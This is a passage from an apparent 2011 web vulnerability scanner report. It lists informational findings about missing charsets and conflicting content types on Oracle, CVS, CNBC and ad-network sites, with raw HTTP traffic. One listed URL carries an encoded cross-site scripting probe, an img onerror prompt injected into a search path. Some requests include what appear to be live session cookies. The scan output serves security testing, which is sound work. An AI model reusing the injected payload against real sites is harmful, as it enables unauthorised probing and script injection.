Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; gpv_p24=no%20value; s_nr=1315343469265; gpw_e24=http%3A%2F%2Fwww.oracle.com%2Findex.html; s_sq=oraclecom%2Coracleglobal%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Aheader%25253Acreateorupdateservicerequest%2526oidt%253D1%2526ot%253DA%2526oi%253D1; BIGipServersupport_http_pool1=590844557.24862.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:11:15 GMT
Server: Oracle-Application-Server-11g
Last-Modified: Thu, 29 Oct 2009 11:44:00 GMT
ETag: "f72724-0-477116d600000"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 0
Keep-Alive: timeout=15, max=1800
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en

27.35. https://support.oracle.com/CSP/ui/flash.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://support.oracle.com
Path:	/CSP/ui/flash.html

Request

GET /CSP/ui/flash.html HTTP/1.1
Host: support.oracle.com
Connection: keep-alive
Referer: http://www.oracle.com/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; gpv_p24=no%20value; s_nr=1315343469265; gpw_e24=http%3A%2F%2Fwww.oracle.com%2Findex.html; s_sq=oraclecom%2Coracleglobal%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Aheader%25253Acreateorupdateservicerequest%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:11:13 GMT
Server: Oracle-Application-Server-11g
Last-Modified: Sat, 27 Aug 2011 04:00:37 GMT
ETag: "fa0651-f51-4ab74b4570340"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 3921
Keep-Alive: timeout=15, max=1799
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en">
<head>
<title>My Oracle Support</title>
<meta name="title"
...[SNIP]...

27.36. https://support.oracle.com/CSP/ui/xml/sunConnect.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://support.oracle.com
Path:	/CSP/ui/xml/sunConnect.html

Request

GET /CSP/ui/xml/sunConnect.html HTTP/1.1
Host: support.oracle.com
Connection: keep-alive
Referer: https://support.oracle.com/CSP/ui/flash.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_nr=1315343469265; gpw_e24=http%3A%2F%2Fwww.oracle.com%2Findex.html; BIGipServersupport_http_pool1=590844557.24862.0000; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Aheader%25253Acreateorupdateservicerequest%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:11:17 GMT
Server: Oracle-Application-Server-11g
Last-Modified: Tue, 09 Aug 2011 00:21:30 GMT
ETag: "13ec3f8-1ea-4aa078b92f680"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 490
Keep-Alive: timeout=15, max=1793
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en

<html>
<head>
<script type="text/javascript">

function connectByForm(sessionToken, sunConnectUrl, doc) {

var form = doc.getElementById("connectByForm");

if (sessionToken) {
var stElem = doc
...[SNIP]...

27.37. https://www.atg.com/dojo-1/dijit/nls/loading.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.atg.com
Path:	/dojo-1/dijit/nls/loading.js

Request

GET /dojo-1/dijit/nls/loading.js HTTP/1.1
Host: www.atg.com
Connection: keep-alive
Referer: https://www.atg.com/service/main.jsp?t=homeTab&locale=&_dyncharset=UTF-8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __ngt_ses=445D9FA4; __ngt_cli=8778554336C857464473DAAC; __ngt_ref=google%2BATG%2520e-commerce%2520solutio; sifrFetch=true; __utma=254092376.212551518.1315341136.1315341136.1315341136.1; __utmb=254092376.2.10.1315341136; __utmc=254092376; __utmz=254092376.1315341136.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio; _mkto_trk=id:904-KUW-942&token:_mch-atg.com-1315341137119-43295; JSESSIONID=7BEBA85DDD3B09D2BB095640CBA3C203.22

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0
Last-Modified: Wed, 10 Jun 2009 23:02:08 GMT
ETag: 1244674928000
Content-Length: 74
Content-Type: application/x-javascript
Cache-Control: max-age=86399
Expires: Wed, 07 Sep 2011 15:38:00 GMT
Date: Tue, 06 Sep 2011 15:38:01 GMT
Connection: keep-alive
Vary: Accept-Encoding

({"loadingState": "Loading...", "errorState": "Sorry, an error occurred"})

27.38. https://www.atg.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.atg.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.atg.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __ngt_ses=445D9FA4; __ngt_cli=8778554336C857464473DAAC; __ngt_ref=google%2BATG%2520e-commerce%2520solutio; sifrFetch=true; __utma=254092376.212551518.1315341136.1315341136.1315341136.1; __utmb=254092376.2.10.1315341136; __utmc=254092376; __utmz=254092376.1315341136.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio; _mkto_trk=id:904-KUW-942&token:_mch-atg.com-1315341137119-43295; JSESSIONID=7BEBA85DDD3B09D2BB095640CBA3C203.22

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 19 Jul 2010 15:33:55 GMT
ETag: "60643-8f6-48bbf4be29ec0"
Accept-Ranges: bytes
Content-Length: 2294
Content-Type: text/plain; charset=UTF-8
Cache-Control: public, max-age=86389
Expires: Wed, 07 Sep 2011 15:38:06 GMT
Date: Tue, 06 Sep 2011 15:38:17 GMT
Connection: keep-alive

..............h...&...........h.......(....... ...........@....................]...R...u.......e.......Y...a...$...............$.......u.......4...........3...M...........)...Y.......A...............
...[SNIP]...

27.39. https://www.cvs.com/CVSApp/html/blank.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.cvs.com
Path:	/CVSApp/html/blank.html

Request

GET /CVSApp/html/blank.html HTTP/1.1
Host: www.cvs.com
Connection: keep-alive
Referer: https://www.cvs.com/CVSApp/user/login.jsp?pagevalue=newrx&screenname=newrx&_requestid=362832
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=6A0441D1E876CF59B214E21046F87449.commerce_311; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1315345643244:ss=1315345545800

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:47:32 GMT
Server: Apache
Last-Modified: Wed, 07 May 2008 10:03:57 GMT
Accept-Ranges: bytes
Cache-Control: max-age=0
Expires: Tue, 06 Sep 2011 16:47:32 GMT
Vary: Accept-Encoding
Content-Length: 0
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html

27.40. https://www.cvs.com/CVSApp/user/forgot_password.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.cvs.com
Path:	/CVSApp/user/forgot_password.jsp

Request

GET /CVSApp/user/forgot_password.jsp HTTP/1.1
Host: www.cvs.com
Connection: keep-alive
Referer: https://www.cvs.com/CVSApp/user/login.jsp?pagevalue=newrx&screenname=newrx&_requestid=362882
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=6A0441D1E876CF59B214E21046F87449.commerce_311; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1315345673339:ss=1315345545800

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:47:59 GMT
Server: Apache-Coyote/1.1
X-HP-CAM-COLOR: V=1;ServerAddr=HUTy7wKKcZBJ+snDqdX2/g==;GUID=1|v2-QkLk0k1KwHzJd1VhmMdZIuGGBhJY04BWxnXwFEE7mWgY1E9PA8MxLexKjvy9O|L0NWU0FwcC91c2VyL2ZvcmdvdF9wYXNzd29yZC5qc3A.
Content-Type: text/html;charset=ISO-8859-1
Cache-Control: max-age=0
Expires: Tue, 06 Sep 2011 16:48:00 GMT
Vary: Accept-Encoding
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Length: 10074

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" lang="en" xmlns="http://www.w3.org/1999/xhtml" class="ma
...[SNIP]...

27.41. https://www.cvs.com/CVSApp/user/login.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.cvs.com
Path:	/CVSApp/user/login.jsp

Request

Response

28. Multiple content types specified previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://apps.cnbc.com
Path:	/company/quote/index.asp

Issue detail

The response contains multiple Content-type statements which are incompatible with one another. The following statements were received:

Content-Type: text/html

Issue background

If a web response specifies multiple incompatible content types, then the browser will usually analyse the response and attempt to determine the actual MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of multiple incompatible content type statements does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

GET /company/quote/index.asp?symbol=.DJIA HTTP/1.1
Host: apps.cnbc.com
Proxy-Connection: keep-alive
Referer: http://data.cnbc.com/quotes/.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; s_cc=true; __qseg=Q_D; cnbc_regional_cookie=US; s_nr=1315339529299; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DFront%25257CHome%25257Chomeus%25257C15839285%25257CStock%252520Market%252520News%25252C%252520Business%252520News%25252C%252520Financial%25252C%252520Earni%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257B%252520window.location%25253D%252527http%25253A//data.cnbc.com/quotes/.DJIA%252527%25257D%2526oidt%253D2%2526ot%253DA; cnbcStreamQuoteMasterToggleRememberSwitch=on; cnbc_most_recent_quotes=.DJIA

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 06 Sep 2011 15:05:34 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
Cache-Control: private
Expires: Tue, 06 Sep 2011 14:25:34 GMT
IISExport: This web site was exported using IIS Export v4.2
X-Powered-By: ASP.NET
P3P: CP="PHY ONL UNI PUR FIN COM NAV INT DEM STA HEA CUR ADM DEV OUR IND"
Content-Length: 2525

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>CNBC Quote Modu
...[SNIP]...
</title>
<meta http-equiv="Content-Type" content="" />
<link href="../resources/style/quotemodule.css" type="text/css" rel="stylesheet" media="all" />
...[SNIP]...

29. HTML does not specify charset previous next
There are 84 instances of this issue:

http://a.tribalfusion.com/i.cid
http://a.tribalfusion.com/j.ad
http://a.tribalfusion.com/p.media/aamOnI1cUV0GrpmEn23rFUVFFCVPY0REfYQGBsStZbwYHfrVmbO3GvVXbnAVmuu2AU8P6MD4HFr0HQAntIx3P3R5cvbUGJlVVMjPPnyWd33UrFS2r2rUanvVEQ7STYJScfJPFunRtjdVGMP5buxmtetYayx2t3EPGfA2mJyfvX8cG/2020316/frame.html
http://a.tribalfusion.com/z/i.cid
http://ad.doubleclick.net/adi/N3643.196990.READWRITEWEB.COM/B5659394
http://ad.doubleclick.net/adi/N763.SpecificMedia.com/B5645537.38
http://ad.doubleclick.net/adi/N763.SpecificMedia/B5646003.2
http://ad.doubleclick.net/clk
http://ads.pointroll.com/PortalServe/
http://api-cdn.cnbc.com/api/chart/chart.asp
http://api.cnbc.com/api/chart/chart.asp
http://api.cnbc.com/api/movers/movers.asp
http://apps.cnbc.com/
http://apps.cnbc.com/Includes/CheckPng/Script.asp
http://apps.cnbc.com/company/quote/incchart.asp
http://blog.harbottle.com/dm/wp-content/plugins/wp-hashcash/wp-hashcash-getkey.php
http://blog.harbottle.com/dm/wp-content/plugins/wp-hashcash/wp-hashcash-js.php
http://blog.harbottle.com/dm/xmlrpc.php
http://blogs.oracle.com/main/resource/resources/ora_code_blogs.js
http://blogs.oracle.com/otn/resource/1OTN-2col/OTNHead-Short.png
http://blogs.oracle.com/otn/resource/SunOracle.png
http://blogs.oracle.com/otn/resource/java-logo.png
http://blogs.oracle.com/theme/scripts/clientSideInclude.js
http://blogs.oracle.com/theme/scripts/roller.js
http://c.brightcove.com/services/messagebroker/amf
http://cdn.krxd.net/kruxcontent/krux_iframe.html
http://cdn5.tribalfusion.com/media/1956006/frame.html
http://cdn5.tribalfusion.com/media/2516896//frm.html
http://ds.addthis.com/red/psi/sites/www.dove.us/p.json
http://fls.doubleclick.net/activityi
http://install.volusion.com/installer/demos/Empty.htm
http://js.adsonar.com/js/pass.html
https://login.cnbc.com/
http://m.cnbc.com/mytest/ipecho.php
https://myprofile.oracle.com/EndUser/images/fading-background.png
https://myprofile.oracle.com/EndUser/images/logo-oracle-red.png
https://myprofile.oracle.com/EndUser/jscripts/s_code.js
https://myprofile.oracle.com/EndUser/jscripts/s_code_popup.js
https://myprofile.oracle.com/EndUser/jscripts/s_code_profile.js
https://myprofile.oracle.com/EndUser/jscripts/s_validation.js
http://now.eloqua.com/visitor/v200/svrGP.aspx
http://optimized-by.rubiconproject.com/a/dk.html
http://pro.cnbc.com/
http://pro.cnbc.com/index.asp
https://register.cnbc.com/
https://register.cnbc.com/RandomImage.jsp
http://snas.nbcuni.com/snas/api/getRemoteDomainCookies
https://support.oracle.com/
https://support.oracle.com/CSP/ui/xml/sunConnect.html
http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf
http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf
http://tf.nexac.com/media/1809966/na.html
http://ticker.cnbc.com/
http://tps31.doubleverify.com/visit.js
http://uac.advertising.com/wrapper/aceUACping.htm
http://videometa.cnbc.com/getadmincontent.do
http://view.atdmt.com/BVK/iview/349019750/direct/01/8665855478
http://view.atdmt.com/FXM/iview/308880957/direct/01/1049994
http://view.atdmt.com/FXM/iview/308880957/direct/01/466318
http://view.atdmt.com/FXM/iview/308880957/direct/01/5096911
http://view.atdmt.com/FXM/iview/308880957/direct/01/5912867
http://view.atdmt.com/FXM/iview/308880957/direct/01/6197540
http://view.atdmt.com/FXM/iview/308880957/direct/01/7067761
http://view.atdmt.com/FXM/iview/308880957/direct/01/7533182
http://view.atdmt.com/FXM/iview/308880957/direct/01/7760164
http://view.atdmt.com/iaction/adoapn_AppNexusDemoActionTag_1
http://wd.sharethis.com/api/getCount2.php
http://www.bigcommerce.com/freetrial.php
http://www.bigcommerce.com/lp/e1-lp-ecommerce.php
http://www.gillettevenus.com/en_US/goddess_central/styles/fancybox/jquery.fancybox-1.3.4.js
http://www.gillettevenus.com/en_US/images/go_roll.png
http://www.gillettevenus.com/global/blank.html
http://www.harbottle.com/hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(document.location)%3E9d536909165a5febf
http://www.harbottle.com/hnl/pages/hnl_search2.php/a
http://www.harbottle.com/hnl/pages/hnl_search2.php/pix/Chambers%202011%20Firm%20Logo.jpg
http://www.harbottle.com/hnl/pages/hnl_search2.php/pix/L500%20Logo.gif
http://www.rayalab.com/Scripts/AC_RunActiveContent.js
http://www.rayalab.com/animate.js
http://www.rayalab.com/favicon.ico
http://www.rayalab.com/flexcroll.js
http://www.resourcepoint.net/form.htm
http://www.revsolutionsinc.com/animated_favicon1.gif
http://www.sophelle.com/graphic/bullet-sm-w.gif
http://www.sophelle.com/images/sophelle-ico.ico

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

29.1. http://a.tribalfusion.com/i.cid previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/i.cid

Request

GET /i.cid HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
X-Function: 409
X-Reuse-Index: 1
Content-Type: text/html
Content-Length: 140
Connection: Close

<html><head><title>404 Not Found</title></head>
<body><h1>404 Not Found </h1>The requested url was not found on this server.
</body></html>

29.2. http://a.tribalfusion.com/j.ad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/j.ad

Request

GET /j.ad HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/p.media/aamOnI1cUV0GrpmEn23rFUVFFCVPY0REfYQGBsStZbwYHfrVmbO3GvVXbnAVmuu2AU8P6MD4HFr0HQAntIx3P3R5cvbUGJlVVMjPPnyWd33UrFS2r2rUanvVEQ7STYJScfJPFunRtjdVGMP5buxmtetYayx2t3EPGfA2mJyfvX8cG/2020316/frame.html

Request

Response

29.4. http://a.tribalfusion.com/z/i.cid previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/z/i.cid

Request

GET /z/i.cid HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

29.5. http://ad.doubleclick.net/adi/N3643.196990.READWRITEWEB.COM/B5659394 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3643.196990.READWRITEWEB.COM/B5659394

Request

GET /adi/N3643.196990.READWRITEWEB.COM/B5659394 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 345
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 06 Sep 2011 17:05:44 GMT
Expires: Tue, 06 Sep 2011 17:05:44 GMT
Discarded: true
Connection: close

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b7a/0/0/%2a/d;
...[SNIP]...

29.6. http://ad.doubleclick.net/adi/N763.SpecificMedia.com/B5645537.38 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N763.SpecificMedia.com/B5645537.38

Request

Response

29.7. http://ad.doubleclick.net/adi/N763.SpecificMedia/B5646003.2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N763.SpecificMedia/B5646003.2

Request

Response

29.8. http://ad.doubleclick.net/clk previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/clk

Request

GET /clk HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Error: Not a valid request
Content-Type: text/html
Content-Length: 45
Date: Tue, 06 Sep 2011 17:05:43 GMT
Server: GFE/2.0
Connection: close

<h1>Error 500 Error: Not a valid request</h1>

29.9. http://ads.pointroll.com/PortalServe/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.pointroll.com
Path:	/PortalServe/

Request

Response

29.10. http://api-cdn.cnbc.com/api/chart/chart.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://api-cdn.cnbc.com
Path:	/api/chart/chart.asp

Request

GET /api/chart/chart.asp HTTP/1.1
Host: api-cdn.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Content-Type: text/html
Cache-Control: private
Expires: Tue, 06 Sep 2011 16:25:57 GMT
X-Powered-By: ASP.NET
IISExport: This web site was exported using IIS Export v4.2
P3P: CP="PHY ONL UNI PUR FIN COM NAV INT DEM STA HEA CUR ADM DEV OUR IND"
Date: Tue, 06 Sep 2011 17:05:56 GMT
Content-Length: 70
Connection: close

<pre>An Error occurred with this request.

</pre>">Test link</a><br />

29.11. http://api.cnbc.com/api/chart/chart.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://api.cnbc.com
Path:	/api/chart/chart.asp

Request

GET /api/chart/chart.asp HTTP/1.1
Host: api.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 17:05:59 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 70
Expires: Tue, 06 Sep 2011 16:25:59 GMT
IISExport: This web site was exported using IIS Export v4.2
X-Powered-By: ASP.NET
P3P: CP="PHY ONL UNI PUR FIN COM NAV INT DEM STA HEA CUR ADM DEV OUR IND"

<pre>An Error occurred with this request.

</pre>">Test link</a><br />

29.12. http://api.cnbc.com/api/movers/movers.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://api.cnbc.com
Path:	/api/movers/movers.asp

Request

GET /api/movers/movers.asp?chartType=gainers&rowCount=3&link=quote HTTP/1.1
Host: api.cnbc.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; __qseg=Q_D; s_nr=1315338989816; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSearch%25257CNews%25257CAllT%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257B%252520cnbc_multionclick%252528%252527http%25253A//www.cnbc.com/%252527%252529%25253B%25257D%2526oidt%253D2%2526ot%253DDIV

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 14:56:38 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
Cache-Control: private
Expires: Tue, 06 Sep 2011 14:16:38 GMT
IISExport: This web site was exported using IIS Export v4.2
X-Powered-By: ASP.NET
P3P: CP="PHY ONL UNI PUR FIN COM NAV INT DEM STA HEA CUR ADM DEV OUR IND"
Content-Length: 1933

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Market Movers</title>
<link rel='stylesheet' ty
...[SNIP]...

29.13. http://apps.cnbc.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://apps.cnbc.com
Path:	/

Request

GET / HTTP/1.1
Host: apps.cnbc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; __qseg=Q_D; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339390340; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 403 Forbidden
Server: nginx/0.6.39
Date: Tue, 06 Sep 2011 15:03:41 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
IISExport: This web site was exported using IIS Export v4.2
X-Powered-By: ASP.NET
Content-Length: 218

<html><head><title>Error</title></head><body><head><title>Directory Listing Denied</title></head>
<body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</b
...[SNIP]...

29.14. http://apps.cnbc.com/Includes/CheckPng/Script.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://apps.cnbc.com
Path:	/Includes/CheckPng/Script.asp

Request

GET /Includes/CheckPng/Script.asp HTTP/1.1
Host: apps.cnbc.com
Proxy-Connection: keep-alive
Referer: http://apps.cnbc.com/company/quote/index.asp?symbol=.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; s_cc=true; __qseg=Q_D; cnbc_regional_cookie=US; s_nr=1315339529299; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DFront%25257CHome%25257Chomeus%25257C15839285%25257CStock%252520Market%252520News%25252C%252520Business%252520News%25252C%252520Financial%25252C%252520Earni%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257B%252520window.location%25253D%252527http%25253A//data.cnbc.com/quotes/.DJIA%252527%25257D%2526oidt%253D2%2526ot%253DA; cnbcStreamQuoteMasterToggleRememberSwitch=on; cnbc_most_recent_quotes=.DJIA; 1602%5F0=DD828BEE89FEC86F5AA0DE67CEF82168; 1602%5F1=YYY5%5FpRpBg6l89WksRDGqi31ugg%3D%3D

Response

29.15. http://apps.cnbc.com/company/quote/incchart.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://apps.cnbc.com
